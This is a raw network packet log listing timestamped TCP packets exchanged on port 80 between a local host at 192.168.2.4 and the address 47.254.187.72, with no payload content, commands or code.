                                                                            Jan 2, 2025 20:34:57.890893936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.890919924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.893064976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893081903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893093109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893105984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893115997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893126011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893129110 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.893136978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893146038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893189907 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.893227100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.893848896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893865108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893874884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893884897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893894911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893903971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893904924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.893913031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893920898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.893923044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.893944979 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.894012928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.894515991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.894593000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.894603014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.894613981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.894617081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.894624949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.894634962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.894639969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.894645929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.894668102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.894675970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.894701004 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.895756006 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.911235094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911287069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911303997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911331892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911344051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911355972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911365986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911375046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.911376953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911386967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911442995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911452055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911468029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.911469936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911482096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911492109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911494970 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.911503077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911513090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911525965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.911533117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.911668062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911679029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911689043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911694050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.911700964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911710978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911712885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.911720991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911732912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.911751032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.912365913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.912375927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.912385941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.912388086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.912396908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.912406921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.912409067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.912416935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.912427902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.912440062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.915755033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.918212891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.918221951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.918231964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.918242931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.918252945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.918262959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.918275118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.918284893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.918284893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.918307066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.919754982 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.921235085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.921246052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.921255112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.921288013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.921294928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.921298981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.921309948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.921314001 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.921320915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.921330929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.921355963 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.923753023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.927967072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.927978039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.927988052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.928016901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.928026915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.928050041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.928050995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.928061008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.928071022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.928076029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.928097010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.928320885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.930254936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.930274963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.930331945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.930341959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.930357933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.930358887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.930358887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.930368900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.930380106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.930389881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.930401087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.930409908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.930502892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.935384035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.935405016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.935414076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.935430050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.935440063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.935456038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.935463905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.935465097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.935475111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.935501099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.935501099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.935523033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.935548067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.935884953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.946053982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.946077108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.946086884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.946139097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.946147919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.946149111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.946152925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.946163893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.946171999 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.946176052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.946187019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.946230888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.946311951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.950640917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.950654030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.950664997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.950675011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.950685978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.950695992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.950706959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.950722933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.950722933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.950916052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.968781948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.968802929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.968813896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.968823910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.968839884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.968851089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.968861103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.968864918 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.969161987 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.977698088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.977715969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.977726936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.977736950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.977747917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.977760077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.977771044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.977792978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.979054928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.979902983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.979913950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.979923964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.979933977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.979944944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.979954958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.979965925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.979971886 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.979974985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.980015993 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.980015993 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.980521917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.980600119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.980608940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.980627060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.980638027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.980648994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.980654955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.980659008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.980669022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.980669975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.980688095 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.981338024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.981348991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.981359959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.981364965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.981384039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.981386900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.981404066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.981408119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.981415033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.981425047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.981436014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.981442928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.981442928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.981483936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.981483936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.997998953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998019934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998049021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998059034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998069048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998080015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998142958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998153925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998168945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998178005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998188019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998198032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998208046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998218060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998228073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998325109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.998325109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.998325109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.998325109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.998325109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.998332024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998347044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998358011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998367071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998377085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998387098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998395920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.998402119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.998420000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.999079943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.999092102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.999100924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.999110937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.999111891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.999121904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.999131918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.999135017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.999144077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.999166965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.999756098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.005089998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.005101919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.005112886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.005122900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.005137920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.005147934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.005158901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.005192041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.007754087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.008057117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.008069038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.008079052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.008089066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.008102894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.008112907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.008122921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.008127928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.008135080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.008148909 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.008157969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.011759996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.014767885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.014780045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.014801025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.014811993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.014827967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.014846087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.014856100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.014872074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.014877081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.015752077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.017242908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.017256021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.017266035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.017277956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.017287970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.017298937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.017309904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.017317057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.017317057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.017330885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.019752026 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.022247076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.022258997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.022270918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.022285938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.022295952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.022308111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.022310972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.022335052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.022342920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.022353888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.023750067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.043561935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043637991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043648005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043664932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043675900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043687105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043699980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043711901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043710947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.043720961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043737888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043749094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043759108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043771029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043781042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.043787003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.043837070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.043873072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.055546999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.055560112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.055567026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.055572033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.055577993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.055588961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.055596113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.055600882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.055869102 CET4973080192.168.2.447.254.187.72
